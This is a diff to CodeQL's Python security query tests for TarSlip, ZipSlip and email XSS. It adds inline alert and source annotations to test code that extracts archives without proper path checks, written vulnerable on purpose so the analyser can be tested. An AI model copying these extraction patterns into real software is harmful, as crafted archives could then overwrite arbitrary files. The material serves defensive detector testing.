TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | -| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | -| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref index a518196b6982..2842a87d0803 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-022bis/TarSlipImprov.ql +query: experimental/Security/CWE-022bis/TarSlipImprov.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py index 15bc66b4aea5..3b59f24e4026 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py @@ -12,14 +12,14 @@ unsafe_filename_tar = sys.argv[2] safe_filename_tar = "safe_path.tar" -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] result = [] for member in tar: if ".." in member.name: raise ValueError("Path in member name !!!") result.append(member) path = unsafe_filename_tar -tar.extractall(path=path, members=result) +tar.extractall(path=path, members=result) # $ Alert[py/tarslip-extended] tar.close() @@ -35,27 +35,27 @@ def members_filter1(tarfile): result.append(member) return result -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(path=tempfile.mkdtemp(), members=members_filter1(tar)) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=members_filter1(tar)) # $ Alert[py/tarslip-extended] tar.close() -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] for entry in tar: if ".." in entry.name: raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] def _validate_archive_name(name, target): if not os.path.abspath(os.path.join(target, name)).startswith(target + os.path.sep): raise ValueError(f"Provided language pack contains invalid name {name}") -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] target = "/tmp/unpack" for entry in tar: _validate_archive_name(entry.name, target) - tar.extract(entry, target) + tar.extract(entry, target) # $ Alert[py/tarslip-extended] def members_filter2(tarfile): @@ -85,10 +85,10 @@ def _validate_archive_name(name, target): raise ValueError(f"Provided language pack contains invalid name {name}") target = "/tmp/unpack" -with tarfile.open(unsafe_filename_tar, "r") as tar: +with tarfile.open(unsafe_filename_tar, "r") as tar: # $ Source[py/tarslip-extended] for info in tar.getmembers(): _validate_tar_info(info, target) - tar.extractall(target) + tar.extractall(target) # $ Alert[py/tarslip-extended] def members_filter3(tarfile): @@ -108,11 +108,11 @@ def members_filter3(tarfile): tar.close() -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] tarf = tar.getmembers() for f in tarf: if not f.issym(): - tar.extractall(path=tempfile.mkdtemp(), members=[f]) + tar.extractall(path=tempfile.mkdtemp(), members=[f]) # $ Alert[py/tarslip-extended] tar.close() @@ -120,27 +120,27 @@ class MKTar(TarFile): pass tarball = unsafe_filename_tar -with MKTar.open(name=tarball) as tar: +with MKTar.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar._extract_member(entry, entry.name) + tar._extract_member(entry, entry.name) # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(tarball) as tar: - tar.extractall() +with tarfile.open(tarball) as tar: # $ Source[py/tarslip-extended] + tar.extractall() # $ Alert[py/tarslip-extended] -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(path=tempfile.mkdtemp(), members=None) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=None) # $ Alert[py/tarslip-extended] class MKTar(tarfile.TarFile): pass tarball = unsafe_filename_tar -with MKTar.open(name=tarball) as tar: +with MKTar.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar._extract_member(entry, entry.name) + tar._extract_member(entry, entry.name) # $ Alert[py/tarslip-extended] @contextmanager @@ -148,7 +148,7 @@ def py2_tarxz(filename): with tempfile.TemporaryFile() as tmp: subprocess.check_call(["xz", "-dc", filename], stdout=tmp.fileno()) tmp.seek(0) - with closing(tarfile.TarFile(fileobj=tmp)) as tf: + with closing(tarfile.TarFile(fileobj=tmp)) as tf: # $ Source[py/tarslip-extended] yield tf def unpack_tarball(tar_filename, dest): @@ -156,7 +156,7 @@ def unpack_tarball(tar_filename, dest): # Py 2.7 lacks lzma support tar_cm = py2_tarxz(tar_filename) else: - tar_cm = closing(tarfile.open(tar_filename)) + tar_cm = closing(tarfile.open(tar_filename)) # $ Source[py/tarslip-extended] base_dir = None with tar_cm as tarc: @@ -166,32 +166,32 @@ def unpack_tarball(tar_filename, dest): base_dir = base_name elif base_dir != base_name: print('Unexpected path in %s: %s' % (tar_filename, base_name)) - tarc.extractall(dest) + tarc.extractall(dest) # $ Alert[py/tarslip-extended] return os.path.join(dest, base_dir) unpack_tarball(unsafe_filename_tar, "/tmp/unpack") tarball = unsafe_filename_tar -with tarfile.open(name=tarball) as tar: +with tarfile.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar._extract_member(entry, entry.name) + tar._extract_member(entry, entry.name) # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(name=tarball) as tar: +with tarfile.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -tar = tarfile.open(tarball) -tar.extractall("/tmp/unpack/") +tar = tarfile.open(tarball) # $ Source[py/tarslip-extended] +tar.extractall("/tmp/unpack/") # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(tarball, "r") as tar: - tar.extractall(path="/tmp/unpack/", members=tar) +with tarfile.open(tarball, "r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack/", members=tar) # $ Alert[py/tarslip-extended] def members_filter4(tarfile): @@ -207,8 +207,8 @@ def members_filter4(tarfile): tar.close() -with tarfile.open(unsafe_filename_tar, "r") as tar: - tar.extractall(path="/tmp/unpack") +with tarfile.open(unsafe_filename_tar, "r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack") # $ Alert[py/tarslip-extended] def members_filter5(tarfile): @@ -228,12 +228,12 @@ def members_filter5(tarfile): tmp_dir = "/tmp/" read_type = "r:gz" if filename.endswith("tgz") else "r" -with tarfile.open(filename, read_type) as corpus_tar: +with tarfile.open(filename, read_type) as corpus_tar: # $ Source[py/tarslip-extended] members = [] for f in corpus_tar: if not os.path.isfile(os.path.join(tmp_dir, f.name)): members.append(f) - corpus_tar.extractall(tmp_dir, members=members) + corpus_tar.extractall(tmp_dir, members=members) # $ Alert[py/tarslip-extended] def members_filter6(tarfile): @@ -251,66 +251,66 @@ def members_filter6(tarfile): archive_path = unsafe_filename_tar target_dir = "/tmp/unpack" -tarfile.open(archive_path, "r").extractall(path=target_dir) +tarfile.open(archive_path, "r").extractall(path=target_dir) # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(tarball) as tar: +with tarfile.open(tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: if entry.isfile(): - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] for entry in tar: if entry.name.startswith("/"): raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.TarFile(tarball, mode="r") as tar: +with tarfile.TarFile(tarball, mode="r") as tar: # $ Source[py/tarslip-extended] for entry in tar: if entry.isfile(): - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] for entry in tar: if os.path.isabs(entry.name): raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] -with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: - tar.extractall(path="/tmp/unpack") +with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack") # $ Alert[py/tarslip-extended] -tar = tarfile.open(filename) -tar.extractall(path=tempfile.mkdtemp(), members=tar.getmembers()) +tar = tarfile.open(filename) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=tar.getmembers()) # $ Alert[py/tarslip-extended] tar.close() -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(path=tempfile.mkdtemp(), members=None) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=None) # $ Alert[py/tarslip-extended] tar.extractall(path=tempfile.mkdtemp(), members=members_filter4(tar)) tar.close() -with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: - tar.extractall(path="/tmp/unpack/", members=tar) +with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack/", members=tar) # $ Alert[py/tarslip-extended] -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] result = [] for member in tar: if member.issym(): raise ValueError("But it is a symlink") result.append(member) -tar.extractall(path=tempfile.mkdtemp(), members=result) +tar.extractall(path=tempfile.mkdtemp(), members=result) # $ Alert[py/tarslip-extended] tar.close() archive_path = unsafe_filename_tar target_dir = "/tmp/unpack" -tarfile.TarFile(unsafe_filename_tar, mode="r").extractall(path=target_dir) \ No newline at end of file +tarfile.TarFile(unsafe_filename_tar, mode="r").extractall(path=target_dir) # $ Alert[py/tarslip-extended] \ No newline at end of file diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected index 6b618335d810..eecdfd0494fb 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected @@ -1,3 +1,9 @@ +#select +| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | +| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | edges | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | provenance | | | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | zipslip_bad.py:10:13:10:17 | ControlFlowNode for entry | provenance | | @@ -36,9 +42,3 @@ nodes | zipslip_bad.py:35:9:35:9 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | subpaths -#select -| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | -| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref index 717dc9d0f105..177a74d6bd74 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-022/ZipSlip.ql +query: experimental/Security/CWE-022/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py index c622ead874cb..4e7195cf856d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py @@ -5,35 +5,35 @@ import zipfile def unzip(filename): - with tarfile.open(filename) as zipf: + with tarfile.open(filename) as zipf: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for entry in zipf: - shutil.move(entry, "/tmp/unpack/") + shutil.move(entry, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip1(filename): - with gzip.open(filename) as zipf: + with gzip.open(filename) as zipf: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for entry in zipf: - shutil.copy2(entry, "/tmp/unpack/") + shutil.copy2(entry, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip2(filename): - with bz2.open(filename) as zipf: + with bz2.open(filename) as zipf: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for entry in zipf: - shutil.copyfile(entry, "/tmp/unpack/") + shutil.copyfile(entry, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip3(filename): zf = zipfile.ZipFile(filename) - with zf.namelist() as filelist: + with zf.namelist() as filelist: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for x in filelist: - shutil.copy(x, "/tmp/unpack/") + shutil.copy(x, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip4(filename): zf = zipfile.ZipFile(filename) - filelist = zf.namelist() + filelist = zf.namelist() # $ Alert[py/zipslip] for x in filelist: with zf.open(x) as srcf: - shutil.copyfileobj(x, "/tmp/unpack/") + shutil.copyfileobj(x, "/tmp/unpack/") # $ Sink[py/zipslip] import tty # to set the import root so we can identify the standard library diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref b/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref index dc5c7028f329..96e8c4e0d443 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref @@ -1 +1 @@ -experimental/Security/CWE-074/remoteCommandExecution/RemoteCommandExecution.ql \ No newline at end of file +query: experimental/Security/CWE-074/remoteCommandExecution/RemoteCommandExecution.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected index 8f0493b79278..0a7dde1b81de 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected @@ -1,3 +1,18 @@ +#select +| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | +| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | edges | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:1:19:1:25 | ControlFlowNode for request | provenance | | | flask_mail.py:1:19:1:25 | ControlFlowNode for request | flask_mail.py:13:22:13:28 | ControlFlowNode for request | provenance | | @@ -77,18 +92,3 @@ nodes | smtplib_bad_via_attach.py:23:5:23:8 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | subpaths -#select -| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | 